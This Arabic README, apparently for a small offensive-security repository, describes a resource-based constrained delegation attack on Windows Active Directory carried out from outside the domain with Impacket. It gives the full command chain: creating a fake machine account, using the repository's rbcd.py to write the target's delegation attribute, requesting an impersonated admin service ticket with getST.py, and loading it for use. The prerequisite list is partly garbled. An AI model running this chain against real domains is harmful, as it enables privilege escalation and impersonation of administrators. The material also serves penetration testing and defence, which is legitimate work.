
هجوم Kerberos للتفويض المقيد القائم على الموارد من الخارج باستخدام Impacket
هذا المستودع يتعلق بهجوم عملي ضد تفويض Kerberos المقيد القائم على الموارد في مجال ويندوز Active Directory.
الفرق عن التطبيقات الأخرى الشائعة هو أننا نشن الهجوم من خارج مجال ويندوز، وليس من جهاز كمبيوتر منضم للمجال (عادة ما يكون ويندوز).
يتم تنفيذ الهجوم باستخدام Python3 Impacket فقط (وتوابعه). تم اختباره على Arch مع أحدث إصدار من Impacket (0.9.21 وقت الكتابة).

باختصار، دون تفاصيل عميقة، يستهدف الهجوم كمبيوترًا في المجال، وتحديدًا مبادئ خدمة متعلقة بكمبيوتر المجال الهدف.
ما نحتاجه هنا كمتطلبات مسبقة:
msDS-AllowedToActOnBehalfOfOtherIdentity لكائن الكمبيوتر الهدف في المجال)MachineAccountQuota)مسار الهجوم بمستوى عالٍ جدًا:
msDS-AllowedToActOnBehalfOfOtherIdentity الخاصة بالهدفالفائدة:
تعمل الأدوات الشائعة لهذا الهجوم على جهاز ويندوز منضم للمجال باستخدام:
إساءة استخدام msDS-AllowedToActOnBehalfOfOtherIdentityيستخدم هذا التنفيذ Impacket الخالص من خارج المجال.
باستخدام مثال addcomputer.py من Impacket، لننشئ كمبيوترًا وهميًا (اسمه evilcomputer):
addcomputer.py -computer-name 'evilcomputer$' -computer-pass ev1lP@sS -dc-ip 192.168.33.203 ecorp.local/test:ohW9Lie0
تم تطوير النص rbcd.py الموجود هنا في المستودع والذي
يضيف واصف الأمان المرتبط بالكمبيوتر الوهمي EVILCOMPUTER المنشأ حديثًا إلى
خاصية msDS-AllowedToActOnBehalfOfOtherIdentity للكمبيوتر الهدف.
./rbcd.py -f EVILCOMPUTER -t WEB -dc-ip 192.168.33.203 ecorp\\test:ohW9Lie0
يستخدم النص بشكل كبير فئات بايثون الموجودة في مثال ntlmrelayx.py الخاص بـ Impacket.
للحصول على المساعدة ومثال، قم باستدعاء النص بدون خيارات.
الآن كل شيء جاهز لإساءة استخدام التفويض المقيد عن طريق
استعلام S4U2Self والحصول على تذكرة خدمة منتحلة للكمبيوتر الهدف.
باستخدام نص مثال getST.py من Impacket:
getST.py -spn cifs/WEB.ecorp.local -impersonate admin -dc-ip 192.168.33.203 ecorp.local/EVILCOMPUTER$:ev1lP@sS
الأمر أعلاه يجلب تذكرة خدمة CIFS نيابة عن مستخدم المجال المستهدف admin
ويخزنها في الملف admin.ccache.
بعد إضافة مسار الملف إلى متغير KRB5CCNAME تصبح التذكرة قابلة للاستخدام لعملاء Kerberos.
export KRB5CCNAME=`pwd`/admin.ccache
klist
للحصول على تفاصيل حول إساءة استخدام التفويض المقيد القائم على الموارد:
وواحدة من أكثر العروض التقديمية شمولاً حول هجمات Kerberos: